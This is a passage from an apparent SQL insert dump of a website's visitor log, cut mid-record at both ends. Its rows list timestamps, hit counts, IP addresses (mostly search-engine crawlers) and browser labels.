,'51.255.65.31','other'),(151632,1504325950,1,0,1,0,'66.249.76.109',''),(151633,1504326051,1,0,1,0,'66.249.76.89',''),(151634,1504326627,1,0,1,0,'66.249.75.155',''),(151635,1504326815,1,1,0,0,'91.209.11.236','other'),(151636,1504326871,1,1,0,0,'46.42.174.137','chrome'),(151637,1504327544,1,1,0,0,'217.182.132.170','other'),(151638,1504327826,1,1,0,0,'180.76.15.5','other'),(151639,1504327892,1,1,0,0,'40.77.167.86','other'),(151640,1504328069,1,1,0,0,'95.108.181.69','other'),(151641,1504328503,1,0,1,0,'66.249.69.201',''),(151642,1504329432,1,1,0,0,'8.29.198.26','other'),(151643,1504329446,1,1,0,0,'51.255.65.68','other'),(151644,1504329704,1,1,0,0,'217.182.132.78','other'),(151645,1504330067,1,1,0,0,'66.249.75.155','chrome'),(151646,1504330190,1,1,0,0,'66.249.69.201','chrome'),(151647,1504330240,1,1,0,0,'51.255.65.32','other'),(151648,1504330399,1,1,0,0,'66.249.76.91','chrome'),(151649,1504331525,1,1,0,0,'217.182.132.187','other'),(151650,1504332193,1,1,0,0,'217.69.133.85','other'),(151651,1504332436,1,1,0,0,'37.54.23.3','chrome'),(151652,1504332808,1,1,0,0,'217.182.132.60','other'),(151653,1504332920,1,1,0,0,'51.255.65.88','other'),(151654,1504334139,1,0,1,0,'66.249.75.157',''),(151655,1504334389,1,0,1,0,'66.249.76.93',''),(151656,1504334605,1,1,0,0,'51.255.65.97','other'),(151657,1504334743,1,1,0,0,'141.8.142.21','other'),(151658,1504334975,1,1,0,0,'217.182.132.20','other'),(151659,1504335113,1,1,0,0,'40.77.167.86','other'),(151660,1504335343,1,1,0,0,'217.182.132.33','other'),(151661,1504335369,1,1,0,0,'207.46.13.112','other'),(151662,1504335473,1,1,0,0,'51.255.65.12','other'),(151663,1504335482,1,1,0,0,'141.8.183.5','other'),(151664,1504335508,1,1,0,0,'91.196.178.163','chrome'),(151665,1504335696,1,1,0,0,'91.196.178.70','firefox'),(151666,1504335709,1,0,1,0,'66.249.69.199',''),(151667,1504336056,1,1,0,0,'217.182.132.188','other'),(151668,1504336068,1,1,0,0,'51.255.65.23','other'),(151669,1504336704,1,1,0,0,'91.209.11.236','other'),(151670,1504336834,1,1,0,0,'178.154.200.36','other'),(151671,1504337248,1,1,0,0,'217.182.132.22','other'),(151672,1504337538,1,1,0,0,'217.182.132.73','other'),(151673,1504337635,1,1,0,0,'51.255.65.89','other'),(151674,1504338022,5,5,0,0,'188.240.208.219','other'),(151675,1504338808,1,1,0,0,'91.209.11.236','other'),(151676,1504338888,1,0,1,0,'66.249.69.195',''),(151677,1504339086,1,1,0,0,'51.255.65.39','other'),(151678,1504339120,1,1,0,0,'51.255.65.75','other'),(151679,1504339299,1,1,0,0,'51.255.65.73','other'),(151680,1504339352,1,1,0,0,'51.255.65.5','other'),(151681,1504339510,1,1,0,0,'51.255.65.93','other'),(151682,1504340037,1,0,1,0,'66.249.76.107',''),(151683,1504340264,1,1,0,0,'8.29.198.26','other'),(151684,1504340272,1,1,0,0,'91.209.11.236','other'),(151685,1504340867,1,1,0,0,'217.182.132.21','other'),(151686,1504340928,1,1,0,0,'51.255.65.32','other'),(151687,1504341021,1,1,0,0,'40.77.167.86','other'),(151688,1504341087,1,0,1,0,'66.249.76.108',''),(151689,1504341934,1,1,0,0,'95.108.181.69','other'),(151690,1504342127,1,1,0,0,'91.209.11.236','other'),(151691,1504342450,1,1,0,0,'137.74.207.109','other'),(151692,1504343144,1,1,0,0,'141.8.183.1','other'),(151693,1504343340,1,1,0,0,'51.255.65.96','other'),(151694,1504344649,1,1,0,0,'51.255.65.73','other'),(151695,1504344998,1,1,0,0,'141.8.183.1','other'),(151696,1504345039,1,1,0,0,'51.255.65.8','other'),(151697,1504345349,1,1,0,0,'51.255.65.25','other'),(151698,1504345692,1,1,0,0,'62.149.29.38','chrome'),(151699,1504346202,1,1,0,0,'217.182.132.31','other'),(151700,1504346910,1,1,0,0,'217.182.132.150','other'),(151701,1504347280,1,1,0,0,'164.132.162.159','other'),(151702,1504347286,1,1,0,0,'217.182.132.19','other'),(151703,1504347458,1,1,0,0,'217.182.132.30','other'),(151704,1504347983,1,0,1,0,'66.249.69.195',''),(151705,1504348844,1,1,0,0,'217.182.132.32','other'),(151706,1504349301,1,1,0,0,'141.8.142.21','other'),(151707,1504349353,1,1,0,0,'95.108.181.69','other'),(151708,1504349769,1,1,0,0,'213.180.203.32','other'),(151709,1504350509,1,1,0,0,'164.132.162.159','other'),(151710,1504350525,2,2,0,0,'91.209.11.236','other'),(151711,1504350572,1,1,0,0,'164.132.162.157','other'),(151712,1504351114,1,1,0,0,'8.29.198.26','other'),(151713,1504351395,1,0,1,0,'66.249.76.93',''),(151714,1504351719,1,1,0,0,'185.8.107.162','firefox'),(151715,1504353409,1,1,0,0,'213.180.203.32','other'),(151716,1504353561,1,1,0,0,'91.209.11.236','other'),(151717,1504353751,1,1,0,0,'51.255.65.60','other'),(151718,1504353987,1,1,0,0,'178.154.200.7','other'),(151719,1504354215,1,1,0,0,'51.255.65.31','other'),(151720,1504354328,1,1,0,0,'217.77.212.168','firefox'),(151721,1504354734,1,0,1,0,'66.249.75.155',''),(151722,1504354746,1,1,0,0,'66.249.76.91','chrome'),(151723,1504354758,1,1,0,0,'66.249.76.108','chrome'),(151724,1504354830,1,1,0,0,'213.180.203.32','other'),(151725,1504354923,1,1,0,0,'51.255.65.49','other'),(151726,1504355127,1,1,0,0,'207.46.13.112','other'),(151727,1504355338,1,0,1,0,'66.249.76.93',''),(151728,1504355396,1,1,0,0,'89.238.136.154','chrome'),(151729,1504355460,1,1,0,0,'217.182.132.22','other'),(151730,1504355888,1,1,0,0,'95.108.181.69','other'),(151731,1504355903,1,1,0,0,'217.182.132.185','other'),(151732,1504356022,1,1,0,0,'176.15.228.103','msie'),(151733,1504356086,1,1,0,0,'178.154.200.7','other'),(151734,1504357019,1,1,0,0,'40.77.167.154','other'),(151735,1504357491,1,1,0,0,'217.182.132.184','other'),(151736,1504357610,1,1,0,0,'91.209.11.236','other'),(151737,1504357742,1,1,0,0,'217.182.132.74','other'),(151738,1504358014,1,1,0,0,'217.182.132.175','other'),(151739,1504358399,1,1,0,0,'217.182.132.86','other'),(151740,1504358762,1,1,0,0,'95.108.181.69','other'),(151741,1504358887,1,1,0,0,'137.74.207.119','other'),(151742,1504359362,1,1,0,0,'217.182.132.146','other'),(151743,1504359819,1,1,0,0,'178.137.202.252','chrome'),(151744,1504359902,1,1,0,0,'95.108.181.69','other'),(151745,1504360181,1,0,1,0,'66.249.76.108',''),(151746,1504360544,1,1,0,0,'51.255.65.75','other'),(151747,1504360608,1,1,0,0,'141.8.183.1','other'),(151748,1504361172,1,1,0,0,'207.46.13.34','other'),(151749,1504361186,1,1,0,0,'213.180.203.32','other'),(151750,1504361298,1,0,1,0,'66.249.76.109',''),(151751,1504361759,1,1,0,0,'178.154.200.7','other'),(151752,1504361776,1,1,0,0,'51.255.71.120','other'),(151753,1504361950,1,1,0,0,'8.29.198.26','other'),(151754,1504363009,1,1,0,0,'95.108.181.69','other'),(151755,1504363014,1,1,0,0,'51.255.71.128','other'),(151756,1504363018,1,1,0,0,'141.8.142.45','other'),(151757,1504363057,1,1,0,0,'88.198.55.175','other'),(151758,1504363519,1,0,1,0,'66.249.75.155',''),(151759,1504364106,2,2,0,0,'40.77.167.86','other'),(151760,1504364214,1,1,0,0,'91.209.11.236','other'),(151761,1504364290,1,1,0,0,'66.102.9.25','chrome'),(151762,1504364590,1,1,0,0,'137.74.201.108','other'),(151763,1504364770,1,1,0,0,'51.255.65.9','other'),(151764,1504365055,1,1,0,0,'217.182.132.83','other'),(151765,1504365623,1,1,0,0,'51.255.65.62','other'),(151766,1504366177,1,1,0,0,'91.209.11.236','other'),(151767,1504366511,1,1,0,0,'66.249.75.157','chrome'),(151768,1504366515,1,1,0,0,'66.249.76.108','chrome'),(151769,1504366957,1,1,0,0,'162.210.196.130','other'),(151770,1504367176,1,1,0,0,'207.46.13.113','other'),(151771,1504367246,1,1,0,0,'51.255.65.80','other'),(151772,1504367556,1,0,1,0,'66.249.69.195',''),(151773,1504367658,1,1,0,0,'51.255.65.69','other'),(151774,1504368119,1,1,0,0,'217.182.132.36','other'),(151775,1504368497,1,1,0,0,'51.255.65.25','other'),(151776,1504368636,1,1,0,0,'207.46.13.34','other'),(151777,1504369260,1,1,0,0,'51.255.71.110','other'),(151778,1504369450,1,1,0,0,'66.249.76.109','chrome'),(151779,1504369460,1,0,1,0,'66.249.76.108',''),(151780,1504369479,1,1,0,0,'91.209.11.236','other'),(151781,1504369533,1,1,0,0,'137.74.203.194','other'),(151782,1504370098,1,1,0,0,'37.145.8.144','chrome'),(151783,1504370288,1,1,0,0,'51.255.71.98','other'),(151784,1504370437,1,1,0,0,'217.182.132.181','other'),(151785,1504370585,1,1,0,0,'180.76.15.144','other'),(151786,1504370668,1,0,1,0,'66.249.76.91',''),(151787,1504371550,2,2,0,0,'91.209.11.236','other'),(151788,1504371892,1,1,0,0,'78.175.152.91','chrome'),(151789,1504372262,1,1,0,0,'51.255.65.85','other'),(151790,1504372731,1,0,1,0,'66.249.75.155',''),(151791,1504372777,1,1,0,0,'8.29.198.27','other'),(151792,1504372889,1,1,0,0,'217.182.132.32','other'),(151793,1504373201,1,1,0,0,'217.182.132.74','other'),(151794,1504373739,1,1,0,0,'51.255.71.129','other'),(151795,1504374230,1,1,0,0,'213.180.203.32','other'),(151796,1504374526,1,1,0,0,'164.132.162.158','other'),(151797,1504374687,1,1,0,0,'164.132.162.153','other'),(151798,1504375568,1,1,0,0,'95.108.181.63','other'),(151799,1504375577,1,0,1,0,'66.249.75.157',''),(151800,1504376163,1,1,0,0,'217.182.132.23','other'),(151801,1504376819,1,0,1,0,'66.249.76.93',''),(151802,1504377495,1,0,1,0,'66.249.69.201',''),(151803,1504377705,1,1,0,0,'5.45.207.64','other'),(151804,1504377896,1,1,0,0,'207.46.13.113','other'),(151805,1504378093,1,1,0,0,'137.74.203.194','other'),(151806,1504378914,1,1,0,0,'217.182.132.34','other'),(151807,1504378931,1,0,1,0,'66.249.75.155',''),(151808,1504379458,1,1,0,0,'217.182.132.88','other'),(151809,1504379650,1,1,0,0,'217.182.132.186','other'),(151810,1504379935,1,0,1,0,'66.249.76.108',''),(151811,1504380282,1,1,0,0,'151.80.41.169','other'),(151812,1504380311,1,1,0,0,'40.77.167.86','other'),(151813,1504380471,1,1,0,0,'141.8.142.45','other'),(151814,1504380640,1,1,0,0,'5.45.207.32','other'),(151815,1504381135,1,1,0,0,'217.182.132.155','other'),(151816,1504381183,1,1,0,0,'91.196.178.66','chrome'),(151817,1504381619,1,1,0,0,'5.45.207.32','other'),(151818,1504381801,1,0,1,0,'66.249.76.107',''),(151819,1504381826,1,0,1,0,'66.249.69.195',''),(151820,1504382338,1,1,0,0,'51.255.65.66','other'),(151821,1504383606,1,1,0,0,'8.29.198.25','other'),(151822,1504384245,1,1,0,0,'141.8.142.21','other'),(151823,1504384418,1,1,0,0,'95.108.181.69','other'),(151824,1504384453,1,1,0,0,'217.182.132.241','other'),(151825,1504384771,1,1,0,0,'207.46.13.113','other'),(151826,1504384898,1,1,0,0,'51.255.65.57','other'),(151827,1504385245,1,1,0,0,'141.8.142.45','other'),(151828,1504385437,1,1,0,0,'51.255.65.19','other'),(151829,1504385678,1,1,0,0,'195.10.210.49','chrome'),(151830,1504385828,1,1,0,0,'5.45.207.64','other'),(151831,1504385894,1,1,0,0,'95.108.181.63','other'),(151832,1504386328,1,1,0,0,'51.255.65.29','other'),(151833,1504386811,1,1,0,0,'51.255.65.56','other'),(151834,1504386853,1,1,0,0,'95.108.181.63','other'),(151835,1504387208,1,1,0,0,'164.132.162.154','other'),(151836,1504387276,1,1,0,0,'5.45.207.32','other'),(151837,1504387975,1,0,1,0,'66.249.75.157',''),(151838,1504387976,1,1,0,0,'66.249.75.157','chrome'),(151839,1504387977,1,1,0,0,'66.249.76.108','chrome'),(151840,1504388340,1,1,0,0,'217.182.132.53','other'),(151841,1504388793,1,1,0,0,'51.255.65.89','other'),(151842,1504388904,1,1,0,0,'137.74.207.114','other'),(151843,1504388943,1,1,0,0,'51.255.71.120','other'),(151844,1504389047,1,0,1,0,'66.249.69.199',''),(151845,1504389431,1,1,0,0,'51.255.65.35','other'),(151846,1504389446,1,1,0,0,'141.8.183.1','other'),(151847,1504389461,1,1,0,0,'217.182.132.66','other'),(151848,1504389823,1,1,0,0,'51.255.65.27','other'),(151849,1504390345,1,1,0,0,'40.77.167.86','other'),(151850,1504390423,1,1,0,0,'51.255.65.14','other'),(151851,1504390622,1,1,0,0,'141.8.183.1','other'),(151852,1504390824,1,1,0,0,'164.132.162.160','other'),(151853,1504390895,1,1,0,0,'217.182.132.157','other'),(151854,1504391171,1,1,0,0,'217.182.132.56','other'),(151855,1504391399,1,0,1,0,'66.249.76.109',''),(151856,1504393048,1,1,0,0,'51.255.71.133','other'),(151857,1504393264,1,1,0,0,'141.8.142.21','other'),(151858,1504394037,1,1,0,0,'37.9.113.163','other'),(151859,1504394434,1,1,0,0,'8.29.198.27','other'),(151860,1504394502,1,1,0,0,'207.46.13.113','other'),(151861,1504394837,1,1,0,0,'5.45.207.32','other'),(151862,1504394915,1,1,0,0,'95.108.181.63','other'),(151863,1504395472,1,1,0,0,'51.255.65.47','other'),(151864,1504395597,1,1,0,0,'40.77.167.86','other'),(151865,1504395762,1,1,0,0,'91.196.178.97','firefox'),(151866,1504396266,1,1,0,0,'51.255.65.14','other'),(151867,1504396300,1,1,0,0,'207.46.13.34','other'),(151868,1504396309,1,1,0,0,'51.255.65.28','other'),(151870,1504396320,1,1,0,0,'66.249.75.155','chrome'),(151871,1504396325,1,0,1,0,'66.249.76.93',''),(151872,1504397000,1,1,0,0,'5.45.207.64','other'),(151873,1504397196,1,1,0,0,'51.255.65.70','other'),(151874,1504397376,1,1,0,0,'217.182.132.23','other'),(151875,1504397518,1,1,0,0,'5.45.207.32','other'),(151876,1504397552,1,1,0,0,'217.182.132.16','other'),(151877,1504397585,1,1,0,0,'217.182.132.57','other'),(151878,1504398113,1,1,0,0,'213.180.203.32','other'),(151879,1504398439,1,1,0,0,'37.9.113.163','other'),(151880,1504398443,1,1,0,0,'95.108.181.58','other'),(151881,1504399111,1,0,1,0,'66.249.76.109',''),(151882,1504399175,1,1,0,0,'164.132.162.154','other'),(151883,1504399195,1,1,0,0,'51.255.65.96','other'),(151884,1504399239,1,1,0,0,'164.132.164.180','other'),(151885,1504399411,1,1,0,0,'54.165.59.7','other'),(151886,1504399702,1,1,0,0,'51.255.71.112','other'),(151887,1504400024,1,1,0,0,'51.255.65.32','other'),(151888,1504401394,1,1,0,0,'137.74.207.120','other'),(151889,1504401800,1,1,0,0,'141.8.142.21','other'),(151890,1504402557,1,1,0,0,'51.255.65.59','other'),(151891,1504403175,1,1,0,0,'217.182.132.192','other'),(151892,1504403255,1,1,0,0,'141.8.142.21','other'),(151893,1504403259,2,2,0,0,'141.8.183.5','other'),(151894,1504403436,1,1,0,0,'66.249.76.89','chrome'),(151895,1504403590,1,1,0,0,'51.255.65.21','other'),(151896,1504403625,1,0,1,0,'66.249.69.195',''),(151897,1504404632,1,1,0,0,'51.255.65.17','other'),(151898,1504405221,1,1,0,0,'51.255.65.62','other'),(151899,1504405257,1,1,0,0,'8.29.198.27','other'),(151900,1504405509,1,1,0,0,'217.182.132.186','other'),(151901,1504405582,1,1,0,0,'217.182.132.97','other'),(151902,1504405816,1,1,0,0,'217.182.132.52','other'),(151903,1504405887,1,1,0,0,'217.182.132.79','other'),(151904,1504407356,1,1,0,0,'5.45.207.32','other'),(151905,1504408097,1,1,0,0,'51.255.65.65','other'),(151906,1504408149,1,1,0,0,'217.69.133.2','other'),(151907,1504408483,1,1,0,0,'5.45.207.64','other'),(151908,1504408547,1,1,0,0,'51.255.65.24','other'),(151909,1504408968,1,1,0,0,'51.255.65.84','other'),(151910,1504409063,1,1,0,0,'217.182.132.18','other'),(151911,1504409071,1,1,0,0,'217.182.132.31','other'),(151912,1504409194,1,1,0,0,'51.255.65.57','other'),(151913,1504409332,1,1,0,0,'213.180.203.32','other'),(151914,1504409377,1,1,0,0,'91.196.178.165','chrome'),(151915,1504410148,1,1,0,0,'51.255.65.64','other'),(151916,1504410797,1,1,0,0,'91.209.11.236','other'),(151917,1504411092,1,1,0,0,'51.255.71.110','other'),(151918,1504411268,1,1,0,0,'217.182.132.72','other'),(151919,1504411553,1,1,0,0,'51.255.65.82','other'),(151920,1504411728,1,0,1,0,'66.249.76.107',''),(151921,1504411941,1,1,0,0,'141.8.142.21','other'),(151922,1504411986,1,1,0,0,'51.255.65.68','other'),(151923,1504413092,1,1,0,0,'217.182.132.170','other'),(151924,1504413159,1,1,0,0,'91.209.11.236','other'),(151925,1504413605,1,1,0,0,'217.69.133.194','other'),(151926,1504413828,1,1,0,0,'213.180.203.32','other'),(151927,1504414050,1,1,0,0,'51.255.65.50','other'),(151928,1504414226,1,1,0,0,'207.46.13.34','other'),(151929,1504414261,1,1,0,0,'51.255.65.94','other'),(151930,1504414389,1,1,0,0,'141.8.183.5','other'),(151931,1504414716,1,1,0,0,'51.255.65.19','other'),(151932,1504414801,1,1,0,0,'91.209.11.236','other'),(151933,1504414905,1,0,1,0,'66.249.75.155',''),(151934,1504415582,1,1,0,0,'51.255.71.114','other'),(151935,1504415630,1,0,1,0,'66.249.69.199',''),(151936,1504416079,1,1,0,0,'8.29.198.25','other'),(151937,1504416752,2,2,0,0,'95.108.181.69','other'),(151938,1504417118,1,1,0,0,'95.108.181.63','other'),(151939,1504417138,1,1,0,0,'51.255.65.34','other'),(151940,1504417942,1,1,0,0,'94.178.147.130','chrome'),(151941,1504417946,2,2,0,0,'91.209.11.236','other'),(151942,1504418015,1,1,0,0,'51.255.71.129','other'),(151943,1504418179,1,1,0,0,'217.182.132.67','other'),(151944,1504418967,1,1,0,0,'217.182.132.27','other'),(151945,1504419540,1,1,0,0,'217.182.132.84','other'),(151946,1504419947,1,1,0,0,'66.249.75.153','chrome'),(151947,1504420759,1,1,0,0,'95.108.181.63','other'),(151948,1504420994,1,0,1,0,'66.249.76.107',''),(151949,1504421303,1,1,0,0,'95.108.181.69','other'),(151950,1504421331,1,1,0,0,'141.8.183.5','other'),(151951,1504421381,1,1,0,0,'40.77.167.145','other'),(151952,1504421438,1,1,0,0,'91.209.11.236','other'),(151953,1504421521,1,1,0,0,'217.182.132.148','other'),(151954,1504421587,1,1,0,0,'51.255.65.31','other'),(151955,1504421757,1,1,0,0,'217.182.132.82','other'),(151956,1504421787,1,1,0,0,'51.255.71.125','other'),(151957,1504422015,1,1,0,0,'51.255.65.90','other'),(151958,1504422990,1,1,0,0,'176.31.231.10','other'),(151959,1504423906,1,1,0,0,'141.8.183.1','other'),(151960,1504424121,1,1,0,0,'217.182.132.155','other'),(151961,1504424300,1,1,0,0,'141.8.142.43','other'),(151962,1504424304,1,1,0,0,'37.9.113.78','other'),(151963,1504424851,1,1,0,0,'217.182.132.183','other'),(151964,1504424897,1,1,0,0,'217.182.132.181','other'),(151965,1504425036,1,1,0,0,'51.255.65.67','other'),(151966,1504425098,1,1,0,0,'217.182.132.77','other'),(151967,1504425153,1,1,0,0,'95.108.181.69','other'),(151968,1504425171,1,1,0,0,'164.132.162.164','other'),(151969,1504425777,1,1,0,0,'51.255.65.14','other'),(151970,1504426019,2,2,0,0,'91.209.11.236','other'),(151971,1504426409,1,1,0,0,'51.255.65.16','other'),(151972,1504426722,1,1,0,0,'141.8.183.5','other'),(151973,1504426907,1,1,0,0,'8.29.198.27','other'),(151974,1504427255,1,1,0,0,'5.248.28.6','msie'),(151975,1504427394,1,1,0,0,'91.209.11.236','other'),(151976,1504427572,1,1,0,0,'141.8.183.1','other'),(151977,1504427665,1,0,1,0,'66.249.76.89',''),(151978,1504428201,1,1,0,0,'217.182.132.176','other'),(151979,1504428320,1,1,0,0,'51.255.64.106','other'),(151980,1504428797,1,1,0,0,'108.12.37.82','other'),(151981,1504428810,2,2,0,0,'91.209.11.236','other'),(151982,1504429174,1,1,0,0,'51.255.65.8','other'),(151983,1504429658,1,1,0,0,'141.8.183.5','other'),(151984,1504430209,1,1,0,0,'213.180.203.32','other'),(151985,1504430261,1,1,0,0,'51.255.65.30','other'),(151986,1504430403,1,1,0,0,'51.255.71.117','other'),(151987,1504430827,1,1,0,0,'91.209.11.236','other'),(151988,1504431988,1,1,0,0,'217.182.132.146','other'),(151989,1504432087,1,1,0,0,'217.182.132.15','other'),(151990,1504432333,3,3,0,0,'91.209.11.236','other'),(151991,1504433145,1,1,0,0,'40.77.167.86','other'),(151992,1504433750,1,1,0,0,'5.45.207.64','other'),(151993,1504434006,1,1,0,0,'137.74.207.119','other'),(151994,1504434096,2,2,0,0,'91.209.11.236','other'),(151995,1504434299,1,1,0,0,'51.255.65.58','other'),(151996,1504434567,1,1,0,0,'176.38.80.20','chrome'),(151997,1504434590,1,1,0,0,'51.255.65.81','other'),(151998,1504434871,1,1,0,0,'95.108.181.63','other'),(151999,1504435395,1,1,0,0,'217.182.132.16','other'),(152000,1504435687,1,1,0,0,'51.255.65.6','other'),(152001,1504435823,1,0,1,0,'66.249.76.109',''),(152002,1504435985,1,1,0,0,'66.249.75.153','chrome'),(152003,1504436519,1,1,0,0,'217.182.132.76','other'),(152004,1504436645,1,0,1,0,'66.249.76.107',''),(152005,1504436808,1,1,0,0,'217.182.132.16','other'),(152006,1504437206,1,1,0,0,'141.8.183.5','other'),(152007,1504437285,1,1,0,0,'217.182.132.75','other'),(152008,1504437556,1,1,0,0,'95.108.181.63','other'),(152009,1504437725,1,1,0,0,'8.29.198.27','other'),(152010,1504438039,1,1,0,0,'137.74.203.194','other'),(152011,1504438449,1,1,0,0,'217.182.132.92','other'),(152012,1504440035,1,1,0,0,'66.249.69.201','chrome'),(152013,1504440288,1,1,0,0,'51.255.65.63','other'),(152014,1504440336,1,0,1,0,'66.249.76.89',''),(152015,1504441040,1,1,0,0,'178.154.200.7','other'),(152016,1504441153,1,0,1,0,'66.249.76.107',''),(152017,1504441642,1,1,0,0,'217.182.132.146','other'),(152018,1504443097,1,0,1,0,'66.249.75.155',''),(152019,1504443248,1,1,0,0,'217.69.133.225','other'),(152020,1504444231,1,1,0,0,'217.182.132.157','other'),(152021,1504444250,1,0,1,0,'66.249.75.153',''),(152022,1504444588,1,0,1,0,'66.249.76.109',''),(152023,1504445047,1,1,0,0,'217.182.132.173','other'),(152024,1504445326,1,1,0,0,'51.255.71.133','other'),(152025,1504445489,5,5,0,0,'69.30.198.186','other'),(152026,1504445503,1,1,0,0,'141.8.183.5','other'),(152027,1504445507,1,1,0,0,'137.74.207.110','other'),(152028,1504445653,1,1,0,0,'180.76.15.140','other'),(152029,1504445778,1,1,0,0,'188.163.97.132','chrome'),(152030,1504445794,1,1,0,0,'141.8.142.21','other'),(152031,1504445929,1,1,0,0,'51.255.65.12','other'),(152032,1504446676,1,1,0,0,'51.255.71.98','other'),(152033,1504447070,1,1,0,0,'40.77.167.86','other'),(152034,1504448283,1,1,0,0,'51.255.65.58','other'),(152035,1504448328,1,1,0,0,'185.45.93.205','chrome'),(152036,1504448549,1,1,0,0,'8.29.198.26','other'),(152037,1504448673,1,1,0,0,'217.182.132.172','other'),(152038,1504448923,1,1,0,0,'164.132.162.157','other'),(152039,1504449348,1,1,0,0,'93.75.18.57','firefox'),(152040,1504449482,1,1,0,0,'51.255.65.58','other'),(152041,1504449633,1,0,1,0,'66.249.69.195',''),(152042,1504449869,1,1,0,0,'217.182.132.157','other'),(152043,1504451108,1,1,0,0,'107.167.109.88','other'),(152044,1504451204,1,1,0,0,'51.255.65.35','other'),(152045,1504451261,1,1,0,0,'217.182.132.30','other'),(152046,1504451327,1,1,0,0,'185.105.88.240','chrome'),(152047,1504451359,1,1,0,0,'51.255.65.2','other'),(152048,1504451628,1,1,0,0,'37.54.23.3','chrome'),(152049,1504451974,1,0,1,0,'66.249.69.201',''),(152050,1504452687,1,1,0,0,'217.182.132.52','other'),(152051,1504452871,1,1,0,0,'178.154.200.7','other'),(152052,1504452952,1,1,0,0,'5.45.207.64','other'),(152053,1504453042,1,1,0,0,'95.133.193.213','chrome'),(152054,1504453458,1,1,0,0,'217.182.132.20','other'),(152055,1504453535,1,1,0,0,'141.8.142.45','other'),(152056,1504454052,1,1,0,0,'51.255.65.64','other'),(152057,1504455053,1,1,0,0,'217.182.132.190','other'),(152058,1504455341,1,1,0,0,'217.182.132.68','other'),(152059,1504456144,1,1,0,0,'91.209.11.236','other'),(152060,1504456775,1,1,0,0,'141.8.142.25','other'),(152061,1504456940,1,1,0,0,'40.77.167.86','other'),(152062,1504456968,1,1,0,0,'51.255.65.26','other'),(152063,1504457177,1,1,0,0,'66.249.75.155','chrome'),(152064,1504458245,1,1,0,0,'95.108.181.63','other'),(152065,1504458278,1,1,0,0,'91.196.178.165','chrome'),(152066,1504458368,1,1,0,0,'5.45.207.32','other'),(152067,1504458524,1,1,0,0,'40.77.167.145','other'),(152068,1504458690,1,1,0,0,'51.255.71.130','other'),(152069,1504458762,1,1,0,0,'51.255.65.51','other'),(152070,1504458798,1,1,0,0,'51.255.65.10','other'),(152071,1504458968,1,1,0,0,'5.45.207.64','other'),(152072,1504459207,1,1,0,0,'178.154.200.7','other'),(152073,1504459375,1,1,0,0,'8.29.198.25','other'),(152074,1504460002,1,1,0,0,'51.255.65.21','other'),(152075,1504460058,1,1,0,0,'51.255.65.22','other'),(152076,1504460086,1,1,0,0,'40.77.167.145','other'),(152077,1504460438,1,1,0,0,'95.108.181.63','other'),(152078,1504460524,1,1,0,0,'217.182.132.23','other'),(152079,1504460636,1,1,0,0,'217.182.132.153','other'),(152080,1504460794,1,1,0,0,'162.210.196.98','other'),(152081,1504460869,1,1,0,0,'141.8.183.5','other'),(152082,1504461000,1,1,0,0,'141.8.183.1','other'),(152083,1504461296,1,1,0,0,'91.196.178.40','chrome'),(152084,1504461324,3,3,0,0,'40.77.167.145','other'),(152085,1504461761,1,0,1,0,'66.249.75.157',''),(152086,1504462233,1,1,0,0,'141.8.142.45','other'),(152087,1504462429,2,2,0,0,'91.209.11.236','other'),(152088,1504462574,1,1,0,0,'217.182.132.154','other'),(152089,1504463261,1,1,0,0,'51.255.65.89','other'),(152090,1504463308,1,0,1,0,'66.249.76.89',''),(152091,1504463640,1,1,0,0,'51.255.71.117','other'),(152092,1504464038,1,1,0,0,'141.8.142.45','other'),(152093,1504464240,1,1,0,0,'217.182.132.71','other'),(152094,1504464402,1,1,0,0,'5.45.207.64','other'),(152095,1504464451,1,1,0,0,'137.74.207.161','other'),(152096,1504464721,1,1,0,0,'51.255.65.20','other'),(152097,1504465117,1,1,0,0,'207.46.13.34','other'),(152098,1504465596,1,1,0,0,'51.255.65.21','other'),(152099,1504465623,1,1,0,0,'213.180.203.32','other'),(152100,1504465628,2,2,0,0,'5.45.207.64','other'),(152101,1504465722,1,0,1,0,'66.249.69.199',''),(152102,1504466114,1,1,0,0,'66.249.69.195','chrome'),(152103,1504466217,1,0,1,0,'66.249.76.107',''),(152104,1504466901,1,1,0,0,'141.8.142.56','other'),(152105,1504466987,1,0,1,0,'66.249.76.93',''),(152106,1504467125,1,1,0,0,'51.255.71.113','other'),(152107,1504467201,1,1,0,0,'51.255.71.100','other'),(152108,1504467693,1,1,0,0,'141.8.183.5','other'),(152109,1504467902,1,1,0,0,'5.45.207.64','other'),(152110,1504468258,1,1,0,0,'51.255.65.63','other'),(152111,1504468445,1,1,0,0,'51.255.65.18','other'),(152112,1504468992,1,1,0,0,'95.108.181.69','other'),(152113,1504469727,1,1,0,0,'51.255.65.20','other'),(152114,1504469850,1,1,0,0,'51.255.64.106','other'),(152115,1504470204,1,1,0,0,'8.29.198.25','other'),(152116,1504470292,1,0,1,0,'66.249.69.213',''),(152117,1504470396,1,1,0,0,'185.105.88.240','firefox'),(152118,1504470523,3,3,0,0,'91.209.11.236','other'),(152119,1504471569,1,0,1,0,'66.249.75.157',''),(152120,1504471640,1,1,0,0,'51.255.65.82','other'),(152121,1504471993,1,1,0,0,'164.132.162.153','other'),(152122,1504472432,1,1,0,0,'109.87.139.70','chrome'),(152123,1504472997,1,1,0,0,'217.182.132.81','other'),(152124,1504473122,1,1,0,0,'51.255.65.82','other'),(152125,1504473305,1,1,0,0,'5.45.207.32','other'),(152126,1504474094,1,1,0,0,'217.69.133.194','other'),(152127,1504474413,1,1,0,0,'95.108.181.69','other'),(152128,1504474425,1,1,0,0,'51.255.65.65','other'),(152129,1504474776,1,1,0,0,'51.255.65.89','other'),(152130,1504475930,1,1,0,0,'217.182.132.4','other'),(152131,1504476534,1,1,0,0,'51.255.71.123','other'),(152132,1504476550,1,1,0,0,'141.8.183.1','other'),(152133,1504476624,1,1,0,0,'51.255.65.68','other'),(152134,1504476811,1,1,0,0,'66.249.76.91','chrome'),(152135,1504476848,1,0,1,0,'66.249.76.108',''),(152136,1504477608,1,1,0,0,'217.182.132.92','other'),(152137,1504477828,1,1,0,0,'51.255.65.75','other'),(152138,1504477877,1,1,0,0,'141.8.142.45','other'),(152139,1504478633,1,1,0,0,'141.8.142.21','other'),(152140,1504478732,1,1,0,0,'178.154.200.7','other'),(152141,1504481344,1,1,0,0,'51.255.71.127','other'),(152142,1504481451,1,1,0,0,'65.19.138.33','other'),(152143,1504481594,1,1,0,0,'91.209.11.236','other'),(152144,1504481787,1,1,0,0,'217.182.132.7','other'),(152145,1504481914,1,1,0,0,'95.108.181.63','other'),(152146,1504481962,1,1,0,0,'217.69.133.194','other'),(152147,1504482526,1,1,0,0,'37.9.113.138','other'),(152148,1504483181,1,1,0